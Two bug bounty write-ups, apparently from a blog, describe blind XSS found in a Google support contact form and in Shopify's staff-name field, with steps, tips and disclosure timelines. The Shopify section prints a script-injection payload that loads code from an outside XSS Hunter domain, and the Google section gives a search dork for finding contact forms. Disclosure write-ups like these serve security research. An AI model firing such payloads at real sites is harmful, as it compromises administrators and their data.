[Google VRP] How I Get Blind XSS At Google With Dork (First Bounty and HOF )

I’m rioncool22, based on North Sumatera, Indonesia

Entering the Google Hall of Fame is one of my dreams. A lot of my time was spent looking for vulnerabilities on Google, but it didn’t work out. Until one day I received a notification from XSSHunter that my payload was executed on the googleplex.com subdomain :D.

To look for this vulnerability, I used Google Dorking to make the search easier.

Dork : site:support.google.com inurl:/contact/ 

If you searching with this dork, You will find lots of contact forms.

After some searching, i found this link https://support.google.com/cloud/contact/prod_issue 😀

Fill XSSHunter Payload in the name and get executed in Google Admin Panel

Step To Reproduce : 
1. Open this link https://support.google.com/cloud/contact/prod_issue
2. Fill Subject, Full Description, and Affected product with XSS hunter Payload
3. XSS will be executed in googleplex.com subdomain 😀

Tips : You can upgrade the dork with another word, like “fill out this form” to find more contact forms 😀

Timeline :

  • 26 Feb 2020 : Submit Report To Google VRP
  • 27 Feb 2020 : First Respond From Google VRP
  • 28 Feb 2020 : Nice catch!!!
  • 25 Mar 2020 : Bounty Awarded $3133.70
  • 11 Mar 2021 : Public Disclosure

Get in touch with me on :



(Shopify.com) Blind Stored XSS Via Staff Name $$$$

First, I want to thank apapedulimu for allowing me to make my first write up on this blog

I’m rioncool22, based on North Sumatera, Indonesia

I want to share to you about my finding in shopify.com (Hackerone Program). I very often do bug searches on the shopify site and submit reports but it always ends with Informative and N/A. But, one day i read a report from the Hactivity about blind XSS. The payload get executed at unexpected place. After that, I tried it on shopify and the payload got fired in admin panel 😀


Step to reproduce :

  1. Go to https://your-store.myshopify.com/admin/settings/account
  2. Add Staff Account
  3. Fill First & Last Name with this payload “><script>$.getScript(“//xsshunterdomain”)</script>
  4. XSS fired in Admin Panel

Some tips : If you search XSS Bug, Change your payload with XSS Hunter payload, because you will not know where the payload get fired 😀

Timeline : 

  • Aug 1 : Submit Report to Shopify
  • Aug 4 : First respone from Shopify
  • Aug 5 : Triaged
  • Aug 6 : Resolved & Rewarded $$$$
  • Aug 19 : Public Disclosure

Get in touch with me on :